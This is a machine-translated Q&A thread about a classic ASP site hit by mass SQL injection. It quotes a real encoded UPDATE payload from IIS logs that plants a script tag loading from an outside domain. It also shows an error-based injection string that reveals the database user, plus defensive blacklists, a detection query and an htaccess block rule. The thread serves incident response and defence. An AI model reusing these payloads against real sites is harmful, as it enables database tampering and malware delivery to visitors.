攻击使用SQL Server数据库的ASP站点

时间:2010-09-24 14:33:15

标签: javascript sql-server asp-classic query-string

我们有一个显然受到攻击的调查网站。症状与本网站下页描述的症状相同: XSS Attack on the ASP.NET Website

我在IIS日志中发现了包含恶意代码的多个条目:

  

< / title> < script src = http:// google-stats49.info/ur.php>。

以下是其中一个IIS日志条目的cs-uri-query字段值的示例。

  

surveyID = 91 +更新+ usd_ResponseDetails +设定+类别名称= REPLACE(铸造(类别名称+为+ VARCHAR(8000)),流延(CHAR(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) %2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112) %2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112) %2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45) %2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)%2Bchar(105)%2Bchar(110) %2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62) %2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+为+ VARCHAR( 8000)),流延(CHAR(32)+ AS + VARCHAR(8))) -

我不明白上面的代码是如何工作的,但显然这是在查询字符串中发送以破坏数据库表中的列的内容。我们暂时关闭了我们的网站。我们可以从数据库中删除脚本,但这并不能防止它在我们将网站重新联机时再次损坏。

有没有人对如何防止这种情况发生任何建议?

6 个答案:

答案 0 :(得分:7)

这是一个SQL注入。

  1. 永远不要相信用户输入。您正在接受输入并将其直接发送到数据库
  2. 永远不要相信您的用户输入!
  3. 根据允许值的白名单检查所有输入。
  4. 对于文字输入,请确保所有内容都已转义

    5. 这个主题有很多:Google is your friend

答案 1 :(得分:2)

也...

  1. 使用参数化查询。
  2. 摆脱旧的经典ASP,这使得使用参数化查询变得更加困难。转到.NET,它更容易验证,可以限制值,禁止html输入等等。

答案 2 :(得分:2)

不确定这是否仍然与您相关,但我过去曾经发生这种情况,因为我们仍在运行一些旧的asp网站。清理它需要两件事。首先是找到并替换您的数据库的存储过程(对Google来说很容易),如果你可以侥幸逃脱它。不幸的是,有时数据会根据字段类型被截断,但这里没有任何关系。否则,必须为您的数据库回滚。

其次是在数据库连接之前插入一个这样的SQL注入黑客防护脚本作为include

祝你好运。

<% 
'  SqlCheckInclude.asp
'
'  This is the include file to use with your asp pages to 
'  validate input for SQL injection.



Dim BlackList, ErrorPage, s



'
'  Below is a black list that will block certain SQL commands and 
'  sequences used in SQL injection will help with input sanitization
'
'  However this is may not suffice, because:
'  1) These might not cover all the cases (like encoded characters)
'  2) This may disallow legitimate input
'
'  Creating a raw sql query strings by concatenating user input is 
'  unsafe programming practice. It is advised that you use parameterized
'  SQL instead. Check http://support.microsoft.com/kb/q164485/ for information
'  on how to do this using ADO from ASP.
'
'  Moreover, you need to also implement a white list for your parameters.
'  For example, if you are expecting input for a zipcode you should create
'  a validation rule that will only allow 5 characters in [0-9].
'



BlackList = Array("--", ";", "/", "/", "@@", "@",_
                  "char", "nchar", "varchar", "nvarchar",_
                  "alter", "begin", "cast", "create", "cursor",_
                  "declare", "delete", "drop", "end", "exec",_
                  "execute", "fetch", "insert", "kill", "open",_
                  "select", "sys", "sysobjects", "syscolumns",_
                  "table", "update")



'  Populate the error page you want to redirect to in case the 
'  check fails.



ErrorPage = "/ErrorPage.asp"



'''''''''''''''''''''''''''''''''''''''''''''''''''

'  This function does not check for encoded characters
'  since we do not know the form of encoding your application
'  uses. Add the appropriate logic to deal with encoded characters
'  in here 
'''''''''''''''''''''''''''''''''''''''''''''''''''
Function CheckStringForSQL(str) 
  On Error Resume Next 



Dim lstr 



' If the string is empty, return true
  If ( IsEmpty(str) ) Then
    CheckStringForSQL = false
    Exit Function
  ElseIf ( StrComp(str, "") = 0 ) Then
    CheckStringForSQL = false
    Exit Function
  End If



lstr = LCase(str)



' Check if the string contains any patterns in our
  ' black list
  For Each s in BlackList



If ( InStr (lstr, s) <> 0 ) Then
  CheckStringForSQL = true
  Exit Function
End If




Next



CheckStringForSQL = false



End Function 



'''''''''''''''''''''''''''''''''''''''''''''''''''
'  Check forms data
'''''''''''''''''''''''''''''''''''''''''''''''''''



For Each s in Request.Form
  If ( CheckStringForSQL(Request.Form(s)) ) Then



' Redirect to an error page
Response.Redirect(ErrorPage)




End If
Next



'''''''''''''''''''''''''''''''''''''''''''''''''''
'  Check query string
'''''''''''''''''''''''''''''''''''''''''''''''''''



For Each s in Request.QueryString
  If ( CheckStringForSQL(Request.QueryString(s)) ) Then



' Redirect to error page
Response.Redirect(ErrorPage)

End If




Next



'''''''''''''''''''''''''''''''''''''''''''''''''''
'  Check cookies
'''''''''''''''''''''''''''''''''''''''''''''''''''



For Each s in Request.Cookies
  If ( CheckStringForSQL(Request.Cookies(s)) ) Then



' Redirect to error page
Response.Redirect(ErrorPage)




End If



Next



'''''''''''''''''''''''''''''''''''''''''''''''''''
'  Add additional checks for input that your application
'  uses. (for example various request headers your app 
'  might use)
'''''''''''''''''''''''''''''''''''''''''''''''''''



%>

答案 3 :(得分:1)

将IIS配置为发送自定义错误页面或默认错误500页,而不是向客户端发送详细的错误消息。

详细的错误消息已用于查找数据库模式。然后他们使用sql注入来更新文本字段。

以下是获取数据库用户的示例:

/page.asp?realparameter=1And%20char(94)%2Buser%2Bchar(94)=0

即“和^ + user + ^ = 0”并返回:

  

[微软] [ODBC_SQL_Server_Driver] [SQL_SERVER] Conversion_failed_when_converting_nvarchar_value _ '^ myDbUsername ^' _ to_data_type_int。

其中“myDbUsername”是您真正的数据库用户。

使用类似的tecnique,可以逐个获取数据库,表格,列,类型等。

如果您尚未受到攻击,请在IIS中禁用详细错误,否则请检查您的日志以查找哪些页面存在SQL注入漏洞并进行更正。

我写了一个小脚本来检查我的数据库中是否有“&lt; script”:

DECLARE c1 cursor for SELECT 'SELECT COUNT(*), '''+QUOTENAME(TABLE_SCHEMA)+'.'+QUOTENAME(TABLE_NAME)+''', '''+QUOTENAME(COLUMN_NAME)+''''+ 
' FROM ' + quotename(TABLE_SCHEMA) + '.'+QUOTENAME(TABLE_NAME) +
' WHERE ' + QUOTENAME(COLUMN_NAME) + ' LIKE ''%<script%'''
FROM INFORMATION_SCHEMA.COLUMNS c
WHERE DATA_TYPE IN ('nvarchar', 'nchar', 'varchar', 'char', 'text', 'ntext') 
and QUOTENAME(TABLE_NAME) not in (SELECT QUOTENAME(name)AS TABLE_NAME FROM sys.views)
order by QUOTENAME(TABLE_NAME);
DECLARE @CMD VARCHAR(200), @return varchar(10)
OPEN C1
FETCH NEXT FROM C1 INTO @CMD
WHILE @@FETCH_STATUS <> -1
    BEGIN
        declare @sql nvarchar(500), @tbl varchar(200), @col varchar(200)
        set @sql = 'declare c2 cursor for ' + @CMD
        exec sp_executesql @sql
        open c2
        FETCH NEXT FROM C2 INTO @return, @tbl, @col
        WHILE @@FETCH_STATUS <> -1
            BEGIN
            if(@return > 0)
                BEGIN
                    PRINT @return + ' records found in ' + @tbl + '.' + @col
                    exec('SELECT '+@col+' FROM '+@tbl+' WHERE '+@col+' LIKE ''%<script%''')
                END
            FETCH NEXT FROM C2 INTO @return, @tbl, @col
            END
        CLOSE C2
        DEALLOCATE C2
        FETCH NEXT FROM C1 INTO @CMD
    END
CLOSE C1
DEALLOCATE C1

我使用的是IIS 7,Win Server 2008和SQL Server 2008,因此该攻击似乎不会使用网络上许多文章中所述的任何SQL Server 2003/2005漏洞。

答案 4 :(得分:1)

您受到了LizaMoon自动化SQL注入漏洞攻击包的攻击,现在在公司页面上的artice中提到了首先记录攻击的文章:http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx

答案 5 :(得分:1)

BulletProof Security WordPress插件具有SQL注入过滤器,可以在htaccess文件中阻止此攻击。由于您有一个IIS服务器,您需要添加其他功能,使您能够使用htaccess文件,或者您可以通过其他方式与IIS合并SQL注入过滤器,因为htaccess传统上是Apache的事情。这是BulletProof Security主htaccess文件中阻止所有SQL注入黑客尝试的行:

RewriteCond %{QUERY_STRING} ^.*(execute|exec|sp_executesql|request|select|insert|union|declare|drop|delete|create|alter|update|order|char|set|cast|convert|meta|script|truncate).* [NC] 
RewriteRule ^(.*)$ - [F,L]
相关问题
最新问题